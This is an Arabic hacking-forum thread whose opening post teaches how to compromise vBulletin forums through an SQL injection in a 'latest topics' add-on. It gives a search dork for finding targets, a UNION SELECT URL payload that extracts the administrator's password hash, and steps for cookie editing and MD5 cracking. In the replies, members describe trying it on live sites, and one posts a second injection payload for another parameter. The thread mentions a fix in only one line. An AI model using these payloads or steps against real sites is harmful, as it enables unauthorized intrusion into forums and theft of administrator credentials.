المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : شرح الإختراق بالثغرة الجديدة لأخر المواضيع ( vb2 , vb3 )

شبح الليل
23-12-2004, 05:27
بسم الله الرحمن الرحيم


الثغرة في : منتديات vBulletin

الملف المصاب : last.php ( أخر عشر مواضيع )

مكتشف الثغرة : al3ndaleeb

الإصدارات المصابة : جميع الإصدارات vb2 و vb3

( بشرط أن تكون مركبة شريط أخر المواضيع )



طريقة الإختراق :

إذهب إلى أي محرك بحث مثل google.com

وأكتب :

powered by: vbulletin version 3

أو

powered by: vbulletin version 2

إختر أحد المنتديات اللتي ظهرت لك

مثلاً :

http://www.(target).com/vb/index.php

ثم ضع بعد رابط المنتدى مباشرة هذا الكود

last10.php?ftitle=%20WHERE%20userid=0%20UNION%20SE LECT%20null, userid, password, null, null, null, null, null, null%20FROM%20user%20WHERE%20usergroupid=6%20LIMIT %201/*

سوف يصبح الرابط هكذا

http://www.(target).com/vb/last10.php?ftitle=%20WHERE%20userid=0%20UNION%20SE LECT%20null, userid, password, null, null, null, null, null, null%20FROM%20user%20WHERE%20usergroupid=6%20LIMIT %201/*


لا داعي أن أذكركم أن بعض المنتديات يكون شريط أخر المواضيع بإسم غير last.php

مثل : ttlast.php / last10.php

وطبق الثغرة بالمتصفح سوف تجد أمامك الباسورد ( إنظر الصورة )

http://members.lycos.co.uk/lezrcom/upload/up/cllast1.jpg

انسخ الباسورد ومن ناحية معرفة إسم المشرف العام مافيه أسهل منها

إدخل المنتدى وسوف ترى أن العضو رقم 1 هو المشرف العام

الأن بعد أن عرفت الباسورد المشفر وإسم المشرف العام

إذا كان إصدار المنتدى vb2

ماعليك إلا أن تستخدم برنامج &@#&@#&@#&@#&@#&@#Editor ( تحرير الكوكيز )

رابط البرنامج :

إضغط هنا بزر الفأرة الأيمن واختر حفظ باسم (http://members.lycos.co.uk/lezrcom/&@#&@#&@#&@#&@#&@#Editor.zip)

وطريقة إستعماله سهلة جداً

أما إذا كانت النسخة vb3

ما عليك الأن إلا أن تقوم بفك التشفير

ولحد الأن لايوجد برنامج يكسر تشفير MD5

كل الموجودات تعتمد على التخمين

وأفضل الموجود هو

الموقع هذا

http://passcracking.com

وبرنامج Mdcrack موجود في المنتدى ومشروح من قبلي

وبعد فك التشفير ماعليك إلا أن تدخل المنتدى وتسوي اللي تبيه ولكن تذكر أن الله يراك

لذا إن إخترقت منتدى فليكن يستحق الإختراق

طريقة إغلاق الثغرة : إفتح ملف أخر عشر مواضيع

وابحث عن الدالة $ftitle واحذفها فقط .



تحياتي ...
mforislam
23-12-2004, 05:55
شكراً لك أخي وإن شاء الله سوف نجربها
جزاك الله كل خير
القلب المفقود
23-12-2004, 12:18
شكراً اخي العزيز وجزاك الله الف خير...
ومثل ما قلت تذكر أن الله يراك

لذا إن إخترقت منتدى فليكن يستحق الإختراق
ni¶pe®-X§½
23-12-2004, 02:41
شرح ولا احلى

يعطيك العافيه شبح الليل :)
mforislam
23-12-2004, 03:12
السلام عليكم ورحمة الله وبركاته
أخي العزيز أظن إذا ظهرت الرسالة التالية هذا يعني أن الثغرة مقفلة أليس كذلك
]MySQL reported this error while trying to retreive the info: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SE LECT null, userid, password, null, null, null, null, null,
وشكراً لك مرة أخرى
شبح الليل
23-12-2004, 05:22
mforislam
القلب المفقود
Sniper-X

العفو اخواني ومشكورين على الردود

أخوي mforislam

تأكد من نسخك للكود بطريقة صحيحة

تحياتي ...
WolfMan
24-12-2004, 04:08
مرحبا
مشكور ولاهنت حبيبي
بس نفس المشكله يطلعلي
MySQL reported this error while trying to retreive the info: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SE LECT null, userid, password, null, null, null, null, null,

مع العلم نسخته مضبوط :)
الصقر الجارح
24-12-2004, 04:45
مشكور اخى ((شبح الليل)) شرح ولا احلى
غروك
24-12-2004, 04:31
مشكور اخوي شبح الليل ويعطيك الف عافيه

وانا جربت الطريقه وطلع لي ذا الكلام

MySQL reported this error while trying to retreive the info: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SE LECT null, userid, password, null, null, null, null, null,

وش اسوي عقبها توهقت خخخخخخ

اتمنى ترد علي
do2do2
24-12-2004, 07:30
مشكور حبيبى و جارى التجربة
شبح الليل
24-12-2004, 07:34
WolfMan
الصقر الجارح
غروك
do2do2

العفو اخواني ومشكورين على الردود

وللي ماظبط معاه رفعت الكود من غير last.php

ماعليه إلا يضيفه بعد رابط أخر عشر مواضيع

CleCK HeRE (http://members.lycos.co.uk/lezrcom/upload/up/last.php.txt)

تحياتي ...
DeseeL|[
25-12-2004, 02:11
عشت والله استاذنا

شرح متعوب عليه الله يعطيك العافيه

وهذا مو غريب على مواضيعك المميزه كما عودتنا :)


واللي خلقك ودي اقتبس بس موضوعك يخلي الواحد غصب يرد من قلب |1|

تحياتي واحترامي استاذي
الــســاهــر
25-12-2004, 02:41
يعطيك العافيه شبح الليل

ودائما نجد معك كل جديد

لاعدمناك يالغالي



تحياتي لك ..
غروك
25-12-2004, 06:04
اخوي شبح الليل يعطيك العافيه اول شي وياطويل العمر ضبط معي وطلع لي الباسورد مشفر

bb5735d1eb41edaa96ccd4bde3c6ebdc وحملت برنامج Mdcrack وحاولت اكسر الباسورد شغلته ومافيه فايده
قلت يمكن يبغى له وقت نمت وقمت وهو باقي ماكسر الباسورد

<< ناام 7 ساعات خخخخخخخ

المهم هذي صوره للبرنامج وضحت الطريقه الي استعملتهاا اتمنى انك تشوف وتقولي اذا في خطأ

http://members.lycos.co.uk/lezrcom/upload/up/kroooook.JPG
KuwaiTonly
25-12-2004, 07:14
يعطيك الف عافية حبيبي شبح وثغرةقوية ومواقع كبيرة مصابة بها *_*


تحياتي لك *_*
..meto5757..
25-12-2004, 09:36
السلام عليكم يا رجاله

md5

مشكــلة المشــاكل |544|

شوفوا يا رجاله انا فكرت في طريقه حلوه بس ما جربتها نظرا لضيق وقتي

<=-=-=- مشغول على طووول خخخخخخخخ

اننا نحول الباسوورد md5 اللي تطلع من الدااتابيز من المنتدي

الى نفس تشفير الياهووووووو بالبرنامج ده

وانت اعرف نوغ التشفير بتاع الياهو مع نفسك

http://www.handyarchive.com/download/9355/Hyper_Hasher_Setup.exe
وكمان البرنامج ده
http://www.handyarchive.com/download/11978/hashcalc.zip
وده بردو يمكن يساعدنا
http://www.handyarchive.com/download/5042/IsideTrial13.zip
|104|

وبعدين يا غالين تروحواا

تحطوا بالريجستري

وسوي sign in

وقبل الدخول اضغط cancel بس لازم تكون مسوي حفظ لتسجيل الدخول

للياهوو بباسوورد صحيح

وبعدين بأي برنامج كشف النجووم

اكشفها ويبقى سيرفر الياهوو

خدمــــنا |489|

جربوها وردوا على

ســـلام
Yossi
25-12-2004, 09:48
مشكوررر اخوي على الشرح يعطيك العافية
شبح الليل
25-12-2004, 10:50
عشت والله استاذنا

شرح متعوب عليه الله يعطيك العافيه

وهذا مو غريب على مواضيعك المميزه كما عودتنا :)


واللي خلقك ودي اقتبس بس موضوعك يخلي الواحد غصب يرد من قلب |1|

تحياتي واحترامي استاذي

تعيش ياغالي ومافيه إستاذ بعدك حبيبي

الله يعافيك والتمييز نتعلّمه منك

اللي وده يقتبس هو أنا بس ما قدرت غير أضع لك رد خاص

منور أخوي وخلني أشوف نورك دايماً في مواضيعي

تحياتي لك ...
شبح الليل
25-12-2004, 10:53
الــســاهــر

الله يعافيك أخوي وتسلم على تشريفك للموضوع يالغالي

KuwaiTonly

الله يعافيك حبيبي ونورت الموضوع يالغالي

غروك

الله يعافيك أخوي

البرنامج ياخذ وقت هذا شيء طبيعي لأنه يعتمد على التخمين

ومن ناحية طريقتك في إستخدام البرنامج إستخدم جميع الإحتمالات ( أرقام ورموز وأحرف )

واستخدم البرنامج اللي أنا شرحته

وهذا رابط البرنامج crack-MD5 (http://members.lycos.co.uk/lezrcom/upload/up/md5.rar)

..meto5757..

وعليكم السلام ورحمة الله وبركاته

لاتجرب حتى ماتتعب نفسك لأنها ماراح تظبط ومشكور على مرورك

Yossi

العفو أخوي ومشكور على ردك

تحياتي ...
بونوره
26-12-2004, 12:22
يعطيك العافيه الشبح وبالفعل ماهو غريبه من مواضيعك المتميزه .............
القرصان
26-12-2004, 01:47
السلام عليكم ورحمة الله وبركاته

شبح الليل وديزل والشباب كلهم كيف حالكم؟

شبح الليل يادب إنت شرحت إستثمار الثغرة وحذفت متغير ثغرة ثانية

=====================
الإستثمار :
last10.php?ftitle=%20WHERE%20userid=0%20UNION%20SE LECT%20null, userid, password, null, null, null, null, null, null%20FROM%20user%20WHERE%20usergroupid=6%20LIMIT %201/*

حلها تحذف المتغير $ftitle

الإستثمار الثاني :
fsel= FROM thread,user WHERE user.userid=0 UNION SELECT null,password,userid,null,null,null,null,null FROM user WHERE usergroupid=6 LIMIT 1—

أو
last.php?fsel=,user.password as title,user.username as lastposter FROM user,
thread WHERE usergroupid=6 LIMIT 1/*
حلها تحذف المتغير $fsel

ويعطيك الف عافية ياشبح
pppppp
26-12-2004, 02:36
by the name of allah
--------------------------------------
frist man thx for your sweet explanation second god be with you
مسمار جحا
26-12-2004, 08:18
سلالالالالالالالالام
مشكور اخوي على شرح الثغرة ومثل العادة مميز واتمنى لك التوفيق
وعندي سوال جرب اطبق الثغرة على كذا موقع اجنبي ويطلع لي لايمكن العثور على الصفحة ؟
هل معناتها انهم مقفلين الثغرة؟
ولازم يكون شريط اخر عشرة مواضيع موجود في المنتدى علشان اطبقها عليها؟
تحياتي
MaN~HaCkErZ
26-12-2004, 08:29
السلام اخوي مسمار حجا

برد بالنيابة عن اخوي شبح الليل

لا توقع ان احد المواقع الغربيه مركبينه هذا السكربت العربي

المهم إذا قالك لايمكن العثور على الصفحه معناها نفس الملف ماهو موجود last.php او ملف آخر عشره مواضيع


تحياتي
--------
مسمار جحا
26-12-2004, 08:43
الله يعطيك العافية احوي مان
وشكرا على سرعة ردك
تحياتي
شبح الليل
27-12-2004, 02:20
بو نوره

العفو حبيبي ونورت الموضوع يالغالي

القرصان

لا حبيبي الإستثمار اللي شرحته في هذا الموضوع للمتغيير $ftitle

أما المتغيير $fsel فأنا شرحت إستثماره لكن في موضوع أخر

وتسلم أخوي على تشريفك للموضوع

pppppp

العفو أخوي ومشكور على ردك

مسمار جحا

العفو أخوي ومشكور على ردك

MaN~HaCkErZ

تسلم حبيبي وألف شكر على الرد

تحياتي ...
العقرب الفضي
28-12-2004, 11:33
مشكوووووووووووووور
xp 999
28-12-2004, 03:02
مشكــورر يالغالي |3|

وننتظررر جديدك

.. تحياتي .. |2|
شبح الليل
28-12-2004, 11:23
العقرب الفضي
xp 999

العفو اخواني ومشكورين على الردود

تحياتي ...
Center_Hackerz
10-01-2005, 02:47
شبح الليل
وبطل وتكسر العين
حبيبي اشكرك على هذا الشرح
ولكن ممكن اخوي تضيفني على اميلك استاذي الفاضل

اخيك
HaCKoOoR
12-01-2005, 05:33
مشكوووووووووور على الثغرة
الثغرة متجربه وكلو تمام
بس دلوقتى بقى خلاص تقريبا كل المنتديات قفلوها
forhacker
21-01-2005, 03:02
مشكووووور وجزاك الله خيرا
a7sas
30-01-2005, 06:03
ثانكـــــــــــــــــــيو

شرح ولا اروع يا شبــح يا وحش

تسلم ايديك ،
=-==--=-=-=-=-=-=--=
لما شفت في موقع آمن اجنبي لقيت ان مكتشف الثغره dr.death
هل هو اللي كان معنا اعتقد انه من الامارات ، او تشابه اسمــاء ؟

|12|
جاووو
7zN
05-02-2005, 04:55
عطيك العافية ،،
شبح الليل
10-02-2005, 12:02
العفو اخواني ومشكورين على الردود

أخوي a7sas

المدعو dr.death ليس هو من إكتشف الثغره

بل هي معروفه من مده طويله لكن لم تكن منتشره

وأعتقد أنه هو من كان في المنتدى ولست متأكد لأني لا أعرفه

تحياتي ...
J.o.C.K.é.Y
11-02-2005, 10:44
مشكور شبح الليل .....................